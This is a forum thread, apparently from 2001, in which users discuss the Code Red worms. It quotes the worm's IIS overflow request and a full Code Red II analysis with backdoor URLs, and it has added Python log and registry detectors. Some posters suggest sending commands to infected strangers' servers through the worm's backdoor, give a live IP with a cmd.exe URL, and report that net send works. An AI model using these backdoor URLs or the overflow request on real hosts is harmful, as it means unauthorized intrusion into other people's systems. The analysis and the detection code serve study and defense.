WORM ALERT: CODE RED! and Code Red 2, the return

Windows & Software

Marsh posted on 05-08-2001 at 22:28:57

Those who use a firewall have surely noticed: for the past few days, many machines have been trying to contact neighbouring machines on port 80 with an HTTP request of the form
 
GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
 
In fact, this is the Code Red worm, which spreads on NT/2000 servers.
Its final objective is a DoS attack against the site www.whitehouse.gov.
Many machines are infected.
 
For more info:
http://www.securityfocus.com/frame [...] ads%3D1%26
 
 
Microsoft patch:
http://www.microsoft.com/technet/t [...] /security/
 
 
If you think you are infected, act fast; clean your machine, because it can infect several hundred others per day.

 

[edtdd]--Message edited by chr_79--[/edtdd]

Reply


Marsh posted on 05-08-2001 at 22:34:28

Please, those who have installed a Microsoft web server, apply the patch.
I'm fed up with being attacked by Wanadoo subscribers who don't know how to install and configure a web server properly!!!!

Reply

Marsh posted on 05-08-2001 at 23:39:26

er, is there a way to know if you're infected? because normally my Linux router acts as a firewall, but well...

Reply

Marsh posted on 05-08-2001 at 23:42:31

Well yes, with an UP-TO-DATE antivirus

Reply

Marsh posted on 05-08-2001 at 23:43:00

If you have a Microsoft web server somewhere, don't ask yourself whether you're infected or not, just apply the patch. It will protect you just in case.
"Prevention is better than cure"

Reply

Marsh posted on 05-08-2001 at 23:43:23

If you don't forward port 80 from the outside to the inside of your network, you shouldn't be infected.
 
For extra safety, I'd still advise you to apply the Microsoft patch.

Reply

Marsh posted on 05-08-2001 at 23:43:53

here are my logs since Red Code started :p
 
what can I do?
 

Reply

Marsh posted on 05-08-2001 at 23:49:43

Make everyone understand that this damn worm is still on the net.
 
Otherwise, your computer blocked the ports, so no worries.

 

[edtdd]--Message edited by chr_79--[/edtdd]

Reply

Marsh posted on 06-08-2001 at 00:30:48

but actually what bugs me is that at each "attack" I get an SMS on my mobile :p

Reply

Marsh posted on 06-08-2001 at 00:32:41

strange, an SMS on your mobile :lol:

Reply


Marsh posted on 06-08-2001 at 00:33:55

well, I set that as an option ;)

Reply

Marsh posted on 06-08-2001 at 02:44:07

I'm running Win 98.
Any risk of infection?

Reply

Marsh posted on 06-08-2001 at 08:21:42

Is it enough to see the "entry" attempts on port 80? (regardless of whether there is a server behind it or not)
 
Because I logged every connection to port 80 on my machine, and just last night (from 1 am to 8 am) there were 32.
How do I tell the worm apart from a simple attempt to reach my website (as I said, even though I don't have one, they can't know that other than by trying)?

Reply
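Added example, not from the thread: a Python classifier for HTTP request lines that separates the Code Red .ida overflow request quoted at the top of the thread from ordinary hits on port 80. A firewall's "port 80 blocked" entry carries no URL, so this needs request lines from a web-server log or a packet capture; the sample lines, the regular expressions and the verdict names are constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# The %u-escaped tail of the request quoted at the top of this thread:
# 22 complete %uXXXX escapes followed by the truncated "%u00=a".
CODERED_TAIL = ("%u9090%u6858%ucbd3%u7801" * 3
                + "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a")

# Constructed sample request lines for this example; not taken from any real server log.
SAMPLE_REQUESTS = [
    "GET /default.ida?" + "N" * 224 + CODERED_TAIL + " HTTP/1.0",  # Code Red as quoted above
    "GET /default.ida?" + "X" * 224 + CODERED_TAIL + " HTTP/1.0",  # same overflow, other filler
    "GET / HTTP/1.1",
    "GET /scripts/root.exe HTTP/1.0",   # request for the dropped cmd.exe copy
    "GET /msadc/root.exe HTTP/1.0",
    "GET /c/winnt/ HTTP/1.0",           # request through the /c virtual root
    "GET /default.ida HTTP/1.0",        # .ida handler without an overflow payload
    "POST /cgi-bin/form HTTP/1.1",
    "garbage line",
]

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+)\s+(?P<target>\S+)(?:\s+HTTP/\d\.\d)?$")
# One letter repeated at least 50 times (the overflow padding), then one or more
# %uXXXX escapes (the encoded payload). Group 2 is the padding letter.
IDA_OVERFLOW = re.compile(r"^(?P<fill>([A-Za-z])\2{49,})(?P<esc>(?:%u[0-9A-Fa-f]{4})+)")
BACKDOOR_PATHS = ("/scripts/root.exe", "/msadc/root.exe")
VIRTUAL_ROOTS = ("/c/", "/d/")


def classify_request(line):
    """Return a dict whose 'verdict' says what the request line looks like."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return {"verdict": "unparsed"}
    parts = urlsplit(m.group("target"))
    path = parts.path.lower()  # IIS paths are case-insensitive
    if path == "/default.ida":
        o = IDA_OVERFLOW.match(parts.query)
        if o:
            return {"verdict": "codered-overflow",
                    "fill_char": o.group("fill")[0],
                    "fill_len": len(o.group("fill")),
                    "escapes": o.group("esc").count("%u")}
        # .ida handler touched without the padding/payload: worth noting, not the worm
        return {"verdict": "ida-request", "path": path}
    if path in BACKDOOR_PATHS:
        return {"verdict": "root-exe-backdoor", "path": path}
    if path.startswith(VIRTUAL_ROOTS):
        return {"verdict": "virtual-root-backdoor", "path": path}
    return {"verdict": "benign", "path": path}


def summarize(lines):
    """Count verdicts over a batch of request lines."""
    return Counter(classify_request(line)["verdict"] for line in lines)


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(classify_request(line)["verdict"].ljust(24), line[:70])
    print(dict(summarize(SAMPLE_REQUESTS)))
```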

Marsh posted on 06-08-2001 at 09:58:51

bis repetita :mad:
 
-----------------------------------------------------------------
The following is an analysis of the CodeRedII (CodeRed Version 2.0) worm.
eEye Digital Security (www.eeye.com)
Security Focus (www.securityfocus.com)
 
We first were contacted about this worm by the  Security Focus ARIS Incident
Analysts.  While they were monitoring various attacks from around the globe
they started to see a new attack pattern, and after a handful of packet
captures they saw there was a new worm on the loose. So they called up eEye
Digital Security to allow us to perform an analysis of this new worm.
 
There is in fact a completely brand new worm loose on the net right now. It
uses the same injection vector as the first CodeRed worm, however this
second worm has a completely different payload than the first worm.
Therefore this second worm is _NOT_ a variant of the first CodeRed worm.
This is an entirely new worm.
 
This analysis is broken up into 3 sections: 1. Infection 2. Propagation 3.
Trojan
 
You can "follow along" in this analysis by loading the worm binary in IDA
and then following the seg locations.
 
This worm, like the original Code Red worm, will only exploit Windows 2000
web servers because it overwrites EIP with a jmp that is only correct under
Windows 2000. Under NT4.0 etc... that offset is different, so the process
will simply crash instead of allowing the worm to infect the system and
spread.
 
Analysis by Ryan Permeh (ryan@eeye.com) and Marc Maiffret (marc@eeye.com) of
eEye Digital Security (www.eeye.com). Ryan has once again generously taken
the time to comment all of the assembly code for better understanding of the
worm.
 
The fix that has been talked about for Code Red is still the same fix for
this new worm. INSTALL THE MICROSOFT SECURITY PATCH:
http://www.microsoft.com/technet/t [...] /security/bulletin/MS01-033.asp
 
To check if your system has been infected or not look for the existence of
the files, c:\explorer.exe or d:\explorer.exe. Also check your IIS scripts
folder and msadc folder to see if the file root.exe exists. If it does then
you have most likely been infected with this worm. Note: An older sadmin
unicode worm also would rename cmd.exe to root.exe so you could have a bit
of cross over there.
 
To download this analysis and all disassembly files then goto
http://www.eeye.com/html/advisories/coderedII.zip
 
Infection
================
 
1st infection:
 
A. The first thing the worm does is setup a jump table so that it can get to
all of its needed functions.
seg000:000001D0
 
B. The worm then proceeds to get its local IP address. This is later used
to deal with subnet masks (propagation) and to make sure that the worm does
not reinfect the local system.
seg000:000001D5
 
C. Next, the worm gets the local System Language to see if the local system
is running Chinese (Taiwanese) or Chinese (PRC).
seg000:000001F9
 
D. At this point the worm checks if we've executed before, and if so, then
the worm will proceed to the propagation section. (See the propagation
section)
seg000:0000021A
 
E. Next, the worm will check to see if a CodeRedII atom has been placed
(GlobalFindAtomA). This functionality allows the worm to make sure not to
re-infect the local machine. If it sees that the atom exists then it sleeps
forever.
seg000:00000240
 
F. The worm will add a CodeRedII atom. This is to allow the worm the
functionality to check to see if a system has already been infected with the
worm.
seg000:0000027D
 
G. The worm now sets its number of threads to 300 for non-Chinese systems.
If the system is Chinese then it sets it to 600.
seg000:00000286
 
H. At this point the worm spawns a thread starting back at step A. The worm
will spawn threads according to the number set from G. Each new thread will
be a propagation thread.
seg000:000002BA
 
I. This is where the worm calls the trojan functionality. You can find an
analysis of the trojan mechanism down below in the Trojan System section.
seg000:000002C4
 
K. The worm then sleeps for 1 day if the local system is not Chinese, 2 days
if it is.
seg000:000002DA
 
L. Reboot Windows.
seg000:000002E1
 
Propagation
================
 
This is used to spread the worm further.
seg000:000002EB
 
A. Setup local IP_STORAGE variable. This is used for worm propagation
functionality and to make sure not to re-infect the local system.
seg000:000002EB
 
B. Sleep for 64h milliseconds
seg000:000002F1
 
C. Get local system time.  The worm checks to see if the year is less
than 2002 or if the month is less than 10. If the date is beyond either of
those, then the worm reboots the local system. That basically limits the
worm to 10/01 for its spreading (In a perfect world.)
seg000:000002FD
 
D. Setup SockAddr_in.  This will reference the GET_IP section.
seg000:0000031A
 
E. Setup Socket:  This performs a Socket(), stores the handle, then makes it
a non-blocking socket (this is important for speed dealing with connect()
calls)
seg000:00000337
 
F. Connect to the remote host, if it returns a connect right away, goto H.
seg000:00000357
 
The following is how the worm generates the IP address for the next host to
connect to:
 
GET_IP:                                 ; CODE XREF: sub_1C4+168 p
 
call    GET_OCTET       ; load 4th octet (this is in reverse order due to
byte ordering)
mov     bh, al
call    GET_OCTET       ; get 3rd octet
mov     bl, al
shl     ebx, 10h        ; shift bx to the top of ebx
call    GET_OCTET       ; get 2nd octet
mov     bh, al
call    GET_OCTET       ; 1st
mov     bl, al
call    GEN_OCTET       ; get first octet
and     eax, 7          ; and it by 7
call    CHECK_ADDR_MASK ; ecx has eip
 
For each octet, generate a pseudo random byte between 1 and 254, next get a
random octet between 1 and 254 and mask it by 7
finally, use this last byte to gen a 1st octet.
 
most pertinent bit is CHECK_ADDR_MASK
 
this specifies the following:
dd 0FFFFFFFFh           ; 0 - addr masks
dd 0FFFFFF00h           ; 1
dd 0FFFFFF00h           ; 2
dd 0FFFFFF00h           ; 3
dd 0FFFFFF00h           ; 4
dd 0FFFF0000h           ; 5
dd 0FFFF0000h           ; 6
dd 0FFFF0000h           ; 7
 
This mask is applied to the local system's IP address, and matched to the
generated IP Address. This makes a new ip with 0, 1 or 2 bytes of data from
the local ip.
 
For instance, the worm will 1/8th of the time generate a random IP not within
any ranges of the local IP Address.
1/2 of the time, it will stay within the same class A range of the local
IP Address
3/8th of the time, it will stay within the same class B range of the local
IP Address
 
Also note that if the IP the worm generates is 127.x.x.x, 224.x.x.x, or the
same as the local system's IP address then the worm will skip that IP address
and generate a new IP address to try to infect.
 
The way the worm generates IP addresses allows it to find more possible IIS
web servers quicker than the other CodeRed worms that have previously been
released. This new worm is also going to cause a lot more data to be
zigzagged across networks.
 
G. Do a select to get the handle. If no handle is returned, then goto K.
seg000:000003B6
 
H. Set socket to Blocking. This is so select isn't required after the
connect.
seg000:000003C5
 
I. Send a copy of the worm.
seg000:000003E4
 
J. Do a recv. This is not actually used anywhere.
seg000:000003FC
 
K. Close the socket and loop to A.
 
Trojan System
================
 
This portion of the worm is designed to dump root.exe (root.exe is cmd.exe)
into msadc and scripts, and create a trojan on the local drive.
 
seg000:00000804
 
A. Get System directory, this gets the native system directory (ie,
c:\winnt\system32)
seg000:00000810
 
B. Append cmd to the system directory string (c:\winnt\system32\cmd.exe)
seg000:00000828
 
C. Set drive modifier to c:
seg000:0000082D
 
D. copy cmd.exe to /scripts/root.exe (Actual path:
Drivemodifier:\inetpub\scripts\root.exe)
seg000:00000831
 
E. copy cmd.exe to /msadc/root.exe (Actual Path:
DriveModifier:\progra~1\common~1\system\MSADC\root.exe)
seg000:00000863
 
F. Initialize area for explorer.exe
seg000:000008A2
 
G. Create Drive/explorer.exe (drive is c, then d)
seg000:00000E83
 
H. The worm now writes out explorer.exe. There is an embedded binary within
the worm that will be written out to explorer.exe. It has the property that
if an embedded byte is 0xFC, it gets replaced by 20h 0x00 bytes instead of the
regular byte. For more on what the trojan explorer.exe binary does, go to
the Explorer.exe Trojan section. Also, the way NT works is that when a user
logs into the local system it has to load explorer.exe (desktop, task bar
etc...); however, NT looks for explorer.exe first in the main drive path c:\
which means the trojan explorer.exe is going to be loaded the next time a
user logs in... therefore keeping the system trojaned over and over and
over.
seg000:00000EC8
 
I. close explorer.exe
seg000:00000ED5
 
J. Change the drive modifier to D, then the worm goes back to the code in step
D. After it is done, it goes back to step K of the infection process.
seg000:00000EDD
 
Explorer.exe Trojan
================
explorer.exe quick overview:
 
1. Get local systems windows directory.
2. Execute explorer.exe from within the local systems windows directory.
3. The worm now goes into the following loop:
 
while(1)
{
set SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable to
0FFFFFF9Dh, which basically disables system file protection.
set SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\Scripts
to ,,217
set SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\msadc
to ,,217
Set SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\c to
c:\,,217
Set SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\d to
d:\,,217
sleep for 10 minutes
}
 
Basically the above code creates a virtual web path (/c and /d) which maps
/c to c:\ and /d to d:\. The writer of this worm has put in this
functionality to allow for a backdoor to be placed on the system so even if
you remove the root.exe (cmd.exe prompt) from your /scripts folder an
attacker can still use the /c and /d virtual roots to compromise your
system. The attacks would basically look like:
 
http://IpAddress/c/inetpub/scripts/root.exe?/c+dir (if root.exe was still
there) or:
http://IpAddress/c/winnt/system32/cmd.exe?/c+dir Where dir could be any
command an attacker would want to execute.
 
As long as the trojan explorer.exe is running then an attacker will be able
to remotely access your server.
-----------------------------------------------------------------
 
crappy cro$oft products :hot::gun:

Reply
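As an added example (not part of the quoted analysis or of the original post), a Python check for the registry changes the explorer.exe trojan makes, run over a constructed .reg-style export of the Winlogon and Virtual Roots keys; the export format and the sample values are assumptions for illustration.

```python
import re

# Indicators taken from the Code Red II analysis quoted above (SFCDisable value
# and the ",,217" virtual roots); the .reg-style input format is constructed.
SFC_DISABLE_TROJAN = 0xFFFFFF9D
WINLOGON_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
VROOT_KEY = r"SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots"

# Constructed sample export of the two keys as they would look on an infected host.
SAMPLE_EXPORT = r"""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"SFCDisable"=dword:ffffff9d
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots]
"/"="c:\inetpub\wwwroot,,201"
"/Scripts"=",,217"
"/msadc"=",,217"
"/c"="c:\,,217"
"/d"="d:\,,217"
"""

def parse_reg_export(text):
    """Parse [key] headers and "name"=dword:/"string" lines into {key: {name: value}}."""
    tree, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        key = re.match(r"^\[(?:HKEY_LOCAL_MACHINE\\)?(.+)\]$", line)
        if key:
            current = key.group(1)
            tree.setdefault(current, {})
            continue
        val = re.match(r'^"([^"]+)"=(?:dword:([0-9a-fA-F]+)|"(.*)")$', line)
        if val and current is not None:
            name, dword, string = val.groups()
            tree[current][name] = int(dword, 16) if dword is not None else string
    return tree

def code_red2_indicators(text):
    """Return findings matching the trojan's SFCDisable and Virtual Roots changes."""
    tree = parse_reg_export(text)
    findings = []
    if tree.get(WINLOGON_KEY, {}).get("SFCDisable") == SFC_DISABLE_TROJAN:
        findings.append("SFCDisable=0xFFFFFF9D: system file protection disabled")
    for name, value in tree.get(VROOT_KEY, {}).items():
        parts = value.split(",") if isinstance(value, str) else []
        if len(parts) != 3 or parts[2] != "217":
            continue  # ",,217" is the access mask the trojan writes
        drive = " (whole drive exposed)" if name.strip("/").lower() in ("c", "d") else ""
        findings.append(f"virtual root {name} -> {parts[0] or '(empty)'},,217{drive}")
    return findings
```

A clean host gives an empty list; any finding means the explorer.exe trojan has been active, so removing root.exe alone is not enough.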

Marsh Posted on 06-08-2001 at 10:58:04    

NinoH wrote:

I work under Win 98.
Any risk of contamination?

nah, it's just for Windows 2000 Server  :)

Reply

Marsh Posted on 06-08-2001 at 12:08:17    

at the same time you have to see the bright side of things: this virus works with IIS, and IIS has an FTP server, so when you get an alert nothing stops you from going and leaving a little message of displeasure on the hard drive of the nasty person who hasn't patched their PC :D

Reply

Marsh Posted on 06-08-2001 at 12:17:53    

the best thing would be to automate the process on the firewalls, so as to warn all the computers trying to send me the worm.
 
Otherwise, how do you go about leaving a message on the FTP of the infected hosts? Do they have to allow writing? Do you have to use a hole similar to the one red code used?

[edtdd]--Message edited by chr_79--[/edtdd]

Reply

Marsh Posted on 06-08-2001 at 14:25:44    

yes, upload has to be allowed, but that seems to be the case on quite a few machines
there are surely other, more roundabout ways, but I don't have my hacker's manual to hand ;)

Reply

Marsh Posted on 06-08-2001 at 14:46:00    

Especially since it's not only IIS servers that are getting hammered ;)
 
-----------------------------------------------------------------
Any Cisco 600 series DSL router that has not been patched per the
December 2000 Cisco Security Advisory
(http://www.cisco.com/warp/public/707/CBOS-multiple.shtml) will stop
forwarding traffic when scanned by a system infected by the "Code Red"
worm. The power must be cycled to restore normal service. Cisco offers free
software upgrades to all affected customers of the vulnerability described
in the above advisory.
 
jas
 
At 10:43 PM 8/5/01 -0400, Geo. wrote:
>All day I've had customers calling with cisco 678 routers running cbos 2.4.2
>with the web interface disabled. Seems their routers have been crashing.
>
>We traced this back to the code red worm. For some reason even with web
>disabled on these routers port 80 remains open. Simply running a port scan
>and cutting off the connection is enough to crash the router. Locks up
>solid.
>
>I also found a solution, by doing a
>
>set web remote ipaddress
>
>where ipaddress is one of their internal IP's you can prevent outside
>addresses from being able to crash the router.
>
>Just a heads up guys, if you are seeing 678's crashing, give it a try, it's
>working here.
>
>Geo.
----------------------------------------------------------------

Reply

Marsh Posted on 06-08-2001 at 15:12:17    

cool !  :lol:  
 
for info, on my firewall:
02/08: 6 RED CODE 1 contamination attempts
(03/08: firewall not switched on all day)
04/08: 14 contamination attempts (13 RED CODE 2 and 1 RED CODE 1)
05/08: 35 contamination attempts (33 RED CODE 2 and 2 RED CODE 1)
06/08: already 57 contamination attempts and it's not over yet!
 
PS: RED CODE 2 sends the same type of request, except that it's XXXXXXXXXXXXXXXXXXX in place of the NNNNNNNNNNNNNNNN.

[edtdd]--Message edited by chr_79--[/edtdd]

Reply
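An added example (not part of the original post) that classifies web-server log lines into RED CODE 1 (NNNN...) and RED CODE 2 (XXXX...) probes plus the root.exe and /c, /d backdoor requests described in the analysis above, then counts them per day the way the firewall tally above does; the log line format and the sample lines are constructed for illustration.

```python
import re
from collections import Counter

# Constructed sample of access log lines (date time client method url);
# not real captured traffic. Payloads shortened to the distinguishing prefix.
SAMPLE_LOG = """\
2001-08-05 14:02:11 10.0.0.7 GET /default.ida?NNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801=a
2001-08-05 14:09:45 10.0.0.9 GET /default.ida?XXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801=a
2001-08-05 18:30:02 10.0.0.9 GET /default.ida?XXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801=a
2001-08-06 09:15:02 10.0.0.12 GET /scripts/root.exe?/c+dir
2001-08-06 09:16:30 10.0.0.12 GET /c/winnt/system32/cmd.exe?/c+dir
2001-08-06 10:00:00 10.0.0.3 GET /index.html
"""

LINE_RE = re.compile(r"^(\d{4}-\d{2}-\d{2}) \S+ (\S+) (\S+) (\S+)")

def classify_request(url):
    """Label one request URL, or return None for ordinary traffic."""
    m = re.match(r"/default\.ida\?([NX])\1+", url)  # v1 pads with N, v2 with X
    if m:
        return "CodeRed-1" if m.group(1) == "N" else "CodeRed-2"
    if re.search(r"/(scripts|msadc)/root\.exe", url, re.IGNORECASE):
        return "root.exe backdoor probe"  # cmd.exe copy dropped by the worm
    if re.match(r"/[cd]/", url, re.IGNORECASE):
        return "drive virtual-root probe"  # /c and /d roots added by the trojan
    return None

def summarize(log_text):
    """Count labelled requests per (day, label) and the distinct sources per label."""
    per_day, sources = Counter(), {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        day, client, _method, url = m.groups()
        label = classify_request(url)
        if label is None:
            continue
        per_day[(day, label)] += 1
        sources.setdefault(label, set()).add(client)
    return per_day, sources

if __name__ == "__main__":
    per_day, sources = summarize(SAMPLE_LOG)
    for (day, label), n in sorted(per_day.items()):
        print(f"{day} {label}: {n} hit(s) from {len(sources[label])} source(s)")
```

A root.exe or /c, /d probe from an address that never sent the default.ida request is someone using the backdoor rather than the worm itself, which is the case the thread goes on to discuss.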

Marsh Posted on 06-08-2001 at 15:14:51    

Reply

Marsh Posted on 06-08-2001 at 15:21:02    

krapaud> look 8 posts up ;)
 
chr> you haven't seen the state of mine... for a little while now it's been flying a little white flag that it won't stop waving :D :crazy:

[edtdd]--Message edited by Chewbacca--[/edtdd]

Reply

Marsh Posted on 06-08-2001 at 15:22:59    

right, I'd better check all that and work on my firewall
because right now I just block everything and redirect to my win2k with ip masq for ftp, irc and raudio

Reply

Marsh Posted on 06-08-2001 at 15:32:50    

A small clarification: RED CODE 1 attacks the www.whitehouse.gov site, whereas RED CODE 2 simply installs a trojan on your machine.

Reply

Marsh Posted on 06-08-2001 at 15:42:59    

I'm laughing too :)
 
Since, from what I understand, Code Red installs a backdoor on the C: drive, you just need to launch a request on net.exe as if it were a CGI call:
 
c:\winnt\system32\net.exe send * Ce serveur est infecte par Code Red
 
Which in a URL would give something like:
http://ipaddress/c/winnt/system32/net.exe?send+*+Ce+serveur+est+infecte+par+Code+Red
 
That should broadcast the message over the guy's whole domain... could be fun ;)
 
For the version without the backdoor it would be possible to use the same vulnerability as the worm to send the net send...

[edtdd]--Message edited by Requin--[/edtdd]

Reply

Marsh Posted on 06-08-2001 at 15:56:32    

yes, that's right
 
above all, don't try, for example:
 
http://193.252.50.243/c/winnt/system32/cmd.exe?/c+dir
 
because that constitutes a violation of privacy, and only BILL GATES is authorised to view the contents of his customers' hard drives.
 
(be nice, don't wipe the disk of this poor victim of red code 2.)

[edtdd]--Message edited by chr_79--[/edtdd]

Reply

Marsh Posted on 06-08-2001 at 16:01:23    

net send seems to work :D
 
Obviously, since it doesn't return any HTML code, the web server sends back an error.

[edtdd]--Message edited by Requin--[/edtdd]

Reply

Marsh Posted on 06-08-2001 at 16:29:56    

Note that in the coming days, attacks exploiting the presence of the red code 2 worm are going to become more and more frequent.
 
Those with very fast connections are going to kindly lend their bandwidth without knowing it and host lots of Warez programs for free, and all without knowing it...  :sarcastic:

[edtdd]--Message edited by chr_79--[/edtdd]

Reply

Marsh Posted on 06-08-2001 at 16:32:40    

lol :D
obviously!

Reply

Marsh Posted on 06-08-2001 at 16:55:37    

with apache there's no problem at all?

Reply

Marsh Posted on 06-08-2001 at 16:56:29    

no, because it's not made by bill and co

Reply

Marsh Posted on 06-08-2001 at 17:29:07    

chr_79 wrote:

Those with very fast connections are going to kindly lend their bandwidth without knowing it and host lots of Warez programs for free, and all without knowing it...  :sarcastic:  

 
It's already the case, thanks to the weaknesses of the FTP protocol.
And to the ignorance of network admins, of course :)
 :lol:  :lol:  :lol:

Reply

Marsh Posted on 06-08-2001 at 17:30:14    

chr_79 wrote:

Those with very fast connections are going to kindly lend their bandwidth without knowing it and host lots of Warez programs for free, and all without knowing it...  :sarcastic:  

 
It's already the case, thanks to the weaknesses of the FTP protocol.
And to the ignorance of network admins, of course :)
 :lol:  :lol:  :lol:

Reply

Marsh Posted on 06-08-2001 at 17:32:51    

Yep, at a university school there was an anonymous FTP with 4 GB of free space (upload allowed); in roughly 10 hours of attack they pushed 4 GB of Warez in upload and took 56 GB in download.

Reply

Marsh Posted on 06-08-2001 at 18:29:13    

Damn, today no more internet connectivity at work, forced to play UrbanTerror all day long... It's tough!

Reply

Marsh Posted on 07-08-2001 at 01:41:34    

is the microsoft patch enough?

Reply

Marsh Posted on 07-08-2001 at 02:06:10    

Well, I can't install it  
 
I'm on XP so no patch, even the 2000 one doesn't work

Reply

Marsh Posted on 07-08-2001 at 12:18:29    

for xp
 
the problem is only in the beta versions
 
fixed from rc 1 onwards

Reply

Marsh Posted on 07-08-2001 at 12:53:31    

I had some fun doing stats on accesses to port 80 on my computer (connected 24/7 these last few days)... here is the number of accesses per day (first of all):
 
3 Aug 2001      8
4 Aug 2001      34
5 Aug 2001      158
6 Aug 2001      179
7 Aug 2001      149
 
you can see a very clear and fairly rapid increase, especially since the 7th isn't over yet (it's only 12:45), and doing stats per hour I had the maximums between 14:00 and 21:00 (like just 1 access per hour before 14:00 and then suddenly 10-20 accesses/h until 21-22h)
 
Given that there are on average a bit more than 2 accesses per IP, I find this trend worrying...
 
--  
Tentacle

Reply

Marsh Posted on 07-08-2001 at 13:59:57    

... and it's going up fast now... :/

Reply
